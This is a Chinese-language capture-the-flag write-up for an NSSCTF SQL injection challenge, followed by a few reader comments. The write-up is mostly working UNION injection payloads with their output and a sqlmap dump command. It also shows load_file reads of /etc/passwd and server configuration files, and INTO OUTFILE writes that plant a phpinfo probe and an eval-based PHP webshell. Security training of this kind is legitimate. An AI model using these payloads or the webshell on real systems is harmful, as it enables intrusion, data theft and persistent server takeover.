1、查询所有库
?id=-1)))))) union select schema_name,2 from information_schema.schemata%23
Array ( [0] => Array ( [username] => information_schema [password] => 2 )
[1] => Array ( [username] => mysql [password] => 2 )
[2] => Array ( [username] => ctftraining [password] => 2 )
[3] => Array ( [username] => performance_schema [password] => 2 )
[4] => Array ( [username] => test [password] => 2 )
[5] => Array ( [username] => ctf [password] => 2 ) )
2、查询ctf库
?id=-1)))))) union select database(),2%23
Array ( [0] => Array ( [username] => ctf [password] => 2 ) )
?id=-1)))))) union select group_concat(table_name),2 from information_schema.tables where table_schema='ctf'%23
//users
?id=-1)))))) union select group_concat(column_name),2 from information_schema.columns where table_name='users' and table_schema='ctf'%23
// id,username,password
?id=-1)))))) union select group_concat(id,0x7e,username,0x7e,password),2 from users%23
//1~tanji~OHHHHHHH,2~fake_flag~F1rst_to_Th3_eggggggggg!}
//假的flag
3、查询ctftraing库
?id=-1)))))) union select group_concat(table_name),2 from information_schema.tables where table_schema='ctftraining'%23
Array ( [0] => Array ( [username] => flag,news,users [password] => 2 ) )
// flag,news,users
?id=-1)))))) union select group_concat(column_name),2 from information_schema.columns where table_name='flag' and ='ctftraining'%23
Array ( [0] => Array ( [username] => flag [password] => 2 ) )
//flag
?id=-1)))))) union select group_concat(column_name),2 from information_schema.columns where table_name='news' and table_schema='ctftraining'%23
//id,title,content,time
?id=-1)))))) union select group_concat(column_name),2 from information_schema.columns where table_name='users' and table_schema='ctftraining'%23
//id,username,password,ip,time
?id=-1)))))) union select group_concat(id,0x7e,title,0x7e,content,0x7e,time),2 from news where table_schema='ctftraining'%23
//0 results
?id=-1)))))) union select group_concat(id,0x7e,username,0x7e,password,0x7e,ip),2 from users where table_schema='ctftraining'%23
//0 results
?id=-1)))))) union select flag,2 from flag where table_schema='ctftraining'%23
//0 results
怎么会是空的呢????
可能是语句的问题,我们使用Sqlmap直接跑:
sqlmap -u http://node5.anna.nssctf.cn:28051/index.php?id=1 -D "ctftraining" -T flag -C flag --dump
//NSSCTF{b029dc6f-0160-4b1e-b2c1-4aeb301dc3e2}
经过测试,发现了table_schema只是内置库的字段,我们这里指定数据库查询应该用:库名.表名的形式
?id=-1)))))) union select flag,2 from ctftraining.flag%23
// NSSCTF{d999de63-d796-4151-b10e-c77cbc87ab64}
4、寻找彩蛋:
之前查到的假的flag,好像是最后一个彩蛋:
F1rst_to_Th3_eggggggggg!}
5、getshell:
MySQL GETSHELL条件和原理:
条件:
root权限
知道网站根目录绝对路径
secure_file_priv为空或指定目录(@@secure_file_priv参数可以其值)
gpc关闭
原理:
写入webshell,通过参数执行系统命令,结束后删除webshell
附:sqlserver getshell条件和原理
条件:
支持外连
有sa权限
原理:
开启xp_cmd扩展执行系统命令
读写文件:
?id=-1)))))) union select load_file('/etc/passwd'),2%23
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
www-data:x:82:82:Linux User,,,:/home/www-data:/sbin/nologin
mysql:x:100:101:mysql:/var/lib/mysql:/sbin/nologin
nginx:x:101:102:nginx:/var/lib/nginx:/sbin/nologin
读取nginx配置文件,寻找网站根目录
?id=-1)))))) union select load_file('/etc/nginx/nginx.conf'),2%23
Array ( [0] => Array ( [username] => daemon off; worker_processes auto; error_log /var/log/nginx/error.log warn; events { worker_connections 1024; } http { include /etc/nginx/mime.types; default_type application/octet-stream; sendfile on; keepalive_timeout 65; server { listen 80; server_name localhost; root /var/www/html; index index.php; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; location / { try_files $uri $uri/ /index.php?$args; } location ~ \.php$ { try_files $uri =404; fastcgi_pass 127.0.0.1:9000; fastcgi_index index.php; include fastcgi_params; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; } } } [password] => 2 ) )
读取首页:
?id=-1)))))) union select load_file('/var/www/html/index.php'),2%23
Array
(
[0] => Array
(
[username] => <?php
error_reporting(0);
include "connect.php";
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no">
<title>狠狠的注入涅~</title>
<link rel="stylesheet" href="assets/bootstrap/css/bootstrap.min.css">
<link rel="stylesheet"
href="https://fonts.googleapis.com/css?family=Lato:300,400,700,300italic,400italic,700italic&display=swap">
</head>
<body>
<header class="text-center text-white masthead"
style="background:url('https://www.dmoe.cc/random.php')no-repeat center center;background-size:cover;">
<div class="overlay"></div>
<div class="container">
<div class="row">
<div class="col-xl-9 mx-auto position-relative">
<h1 class="mb-5">Search what you want to search</h1>
</div>
<div class="col-md-10 col-lg-8 col-xl-7 mx-auto position-relative">
<form method="get" action="">
<div class="row">
<div class="col-12 col-md-9 mb-2 mb-md-0">
<input class="form-control form-control-lg" type="text" name="id"
placeholder="Enter your id to start">
</div>
<div class="col-12 col-md-3">
<button class="btn btn-primary btn-lg" type="submit">姨妈大!</button>
</div>
</div>
</form>
</div>
</div>
</div>
</header>
<section class="text-center bg-light features-icons">
<div class="container">
<div class="row">
<div class="col-md-6">
<h5>Key Source</h5>
<pre><?php highlight_file(source) ?></pre>
</div>
<div class="col-md-6">
<?php
$sql = "SELECT username,password FROM users WHERE id = ".'(((((('.$_GET["id"].'))))))';
echo "<h5>Executed Operations:</h5>"
.$sql
."<br><br>";
$result = $conn->query($sql);
if ($result->num_rows > 0) {
print_r(mysqli_fetch_all($result, MYSQLI_ASSOC));
} else {
echo "0 results";
}
?>
</div>
</div>
</div>
</section>
<section class="showcase">
<div class="container-fluid p-0">
<div class="row g-0"></div>
</div>
</section>
<script src="assets/bootstrap/js/bootstrap.min.js"></script>
</body>
</html>
[password] => 2
)
)
写入php探针:
?id=-1)))))) union select '<?php phpinfo();?>',2 into outfile '/var/www/html/info.php'%23
http://node6.anna.nssctf.cn:28413/info.php
访问测试:http://node6.anna.nssctf.cn:28413/info.php
写入webshell:
?id=-1)))))) union select '<?php eval($_POST["cc"]);?>',2 into outfile '/var/www/html/cc.php'%23
蚁剑连接:http://node6.anna.nssctf.cn:28413/cc.php 密码cc

flag要这样查:1)))))) union select flag,2 from ctftraining.flag #
马子穿上了。连不上数据库
为什么俺传马穿不上嘞?
wow 很详细捏~